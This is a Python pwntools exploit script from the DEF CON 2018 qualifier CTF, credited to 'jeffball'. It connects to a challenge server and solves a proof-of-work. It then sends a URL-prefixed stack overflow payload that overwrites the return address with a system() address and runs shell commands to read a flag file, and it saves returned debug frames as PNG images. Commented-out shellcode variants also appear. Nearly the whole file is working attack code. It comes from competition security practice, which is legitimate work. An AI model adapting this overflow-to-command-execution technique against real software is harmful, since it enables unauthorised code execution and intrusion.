dc18 quals, all the good parts of this code belong to jeffball

www.py

from pwn import *
from pow import solve_pow 
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode = fd.read()
#fd.close()

def p32(v):
    return struct.pack(">i",v)

folder = "/home/heart/dc18/ssz"

p = remote('ddee3e1a.quals2018.oooverflow.io', 31337)

p.readuntil("Challenge: ")
challenge = p.readuntil("n: ").split("\n")[0]
n = int(p.readuntil("Solution: ").split("\n")[0])
shellcode = "\x42\x85\xcb\x89\xd2\xfc\x3e\x64\x4e\x91"
#shellcode = "\xd2\xfc\xdf\x82\x4e\x91"

# stack 0x3fff694
# stack 0x3fff698
# stack 0x3fff54c

win = "/bin/wall /me/flag;"
padding = win#"open /me/flag;"#"/bin/wall /me/flag;open /me/flag;"#"ls -al / > /me/6969; open /me/6969; sleep 30;"
padding = (";"*(263 - len(padding))) + padding
stack_loc = 0x3fff554

#p.sendline('http://' + 264*";" +
#p.sendline('http://' + padding  +
#	p32(stack_loc) + 
#	p32(stack_loc + len(shellcode)) + 
#	shellcode + ";"+win+";;;;;;;"+win+"; sleep 55;\x00")
#p.sendline('http://' + 0x10d*"A" + p32(0x3fff694) + shellcode)

prewin = ";wall flag;"
win = "/usr/bin/open /me/flag;"
# this needs to be "A" because weird characters will fucking break everything
beforepc = "A"*(260-len(prewin)) + prewin#260#(259-len(win))+win
system=0x050307f8
stack_loc = 0x3fffa10 # a00 = http://aaaa

payload = ('http://'+
           beforepc +
           p32(system) +
           p32(system) +
           p32(stack_loc)+ ";"+
           "`"*(0x200-1) +
           win)
print(repr(payload))

print("solving {} {}".format(challenge,n))
solution = solve_pow(challenge, n)
p.writeline(str(solution))
print("solved...")


p.readuntil("?")
p.sendline(payload)

for i in range(100000):
    print p.readuntil('DEBUG ')
    data = p.readuntil('\n')
    data = data.decode('base64')
    with open(folder + '/%u.png'%i,'w') as f:
        f.write(data)

p.interactive()